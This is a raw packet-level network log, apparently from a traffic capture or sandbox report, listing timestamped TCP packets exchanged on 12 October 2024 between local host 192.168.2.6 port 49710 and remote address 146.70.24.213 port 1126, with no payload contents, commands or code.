Oct 12, 2024 20:30:06.718993902 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.719006062 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.719017982 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.719038010 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.719072104 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.719082117 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.719603062 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.719638109 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.719672918 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.719677925 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.719706059 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.719719887 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.719741106 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.719772100 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.719805956 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.719819069 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.719856024 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.758662939 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.758714914 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.758750916 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.758774996 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.758784056 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.758819103 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.758824110 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.758852005 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.758888006 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.758899927 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.758925915 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.758974075 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.802876949 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.802930117 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.802944899 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.802998066 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.803024054 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.803040028 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.803055048 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.803070068 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.803075075 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.803097010 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.806214094 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.806312084 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.806323051 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.806338072 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.806355000 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.806368113 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.806384087 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.806395054 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.806397915 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.806406021 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.806413889 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.806436062 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.807102919 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.807118893 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.807135105 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.807173014 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.807230949 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.807245970 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.807269096 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.807282925 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.807291031 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.807297945 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.807312965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.807321072 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.807328939 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.807343960 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.807359934 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.807374954 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.807382107 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.807399988 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.807421923 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.807492018 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.807538033 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.807538986 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.807554007 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.807569027 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.807591915 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.807739019 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.807812929 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.807857990 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.807878971 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.807892084 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.807941914 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.808819056 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.808871031 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.808943033 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809047937 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809077978 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809092999 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809101105 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.809108019 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809123993 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809134007 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.809135914 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809173107 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.809181929 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809195995 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809210062 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809225082 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809228897 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.809247017 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809262991 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809269905 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.809278011 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809292078 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809294939 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.809308052 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809329987 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.809330940 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809348106 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809361935 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809369087 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.809386015 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809400082 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809407949 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.809417009 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809429884 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809442997 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809451103 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.809458017 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809473038 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809495926 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.809497118 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809513092 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809529066 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809542894 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.809544086 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809561014 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809576035 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809583902 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.809591055 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809604883 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809611082 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.809622049 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809634924 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809640884 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.809660912 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.809683084 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.809832096 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809856892 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809869051 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809884071 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809905052 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.809952021 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809966087 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809977055 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.809981108 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.809994936 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.810009003 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.810026884 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.810055017 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.810060024 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.810070038 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.810098886 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.810112953 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.810113907 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.810127974 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.810142994 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.810147047 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.810177088 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.811160088 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.811224937 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.811228991 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.811239958 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.811255932 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.811275005 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.811290026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.811290979 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.811309099 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.811319113 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.811323881 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.811348915 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.811362982 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.811377048 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.811412096 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.811424971 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.811429977 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.811440945 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.811455011 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.811455965 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.811469078 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.811487913 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.811522007 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.812479973 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.812535048 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.812556982 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.812602997 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.812638998 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.812654972 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.812669039 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.812684059 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.812690020 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.812728882 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.851046085 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.851073027 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.851087093 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.851118088 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.851172924 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.851178885 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.851193905 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.851210117 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.851223946 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.851233959 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.851238966 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.851286888 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.895652056 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.895667076 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.895699024 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.895708084 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.895714045 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.895730019 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.895745039 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.895754099 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.895761967 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.895812035 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.898807049 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.898822069 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.898837090 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.898853064 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.898866892 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.898884058 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.898890972 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.898900032 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.898914099 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.898935080 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.898958921 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.899697065 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.899713039 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.899738073 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.899751902 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.899760008 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.899768114 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.899790049 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.899792910 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.899806976 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.899821997 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.899840117 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.899863005 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.899866104 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.899878979 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.899893999 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.899899006 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.899909973 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.899910927 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.899925947 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.899955988 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.899991035 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.900127888 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.900142908 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.900156975 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.900171995 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.900181055 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.900187016 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.900216103 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.900227070 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.900242090 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.900255919 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.900319099 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.900319099 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.901154041 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901179075 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901194096 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901210070 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901236057 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.901262045 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901278973 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901279926 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.901293993 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901324034 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.901407003 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901453972 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.901500940 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901515007 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901530027 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901545048 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901560068 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901572943 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.901573896 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901606083 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901616096 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.901621103 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901635885 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901650906 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901665926 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901679039 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901680946 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.901693106 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901716948 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.901801109 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901814938 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901829004 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901849985 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.901878119 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901879072 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.901891947 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901907921 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901933908 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901954889 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.901958942 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901973009 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.901983976 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.901994944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.902009964 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.902018070 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.902024984 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.902043104 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.902053118 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.902056932 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.902070999 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.902087927 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.902108908 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.902606964 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.902621984 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.902637959 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.902652025 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.902664900 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.902674913 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.902688980 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.902704000 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.902708054 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.902718067 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.902729034 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.902733088 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.902755976 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.902757883 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.902770996 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.902786016 CEST	1126	49710	146.70.24.213	192.168.2.6
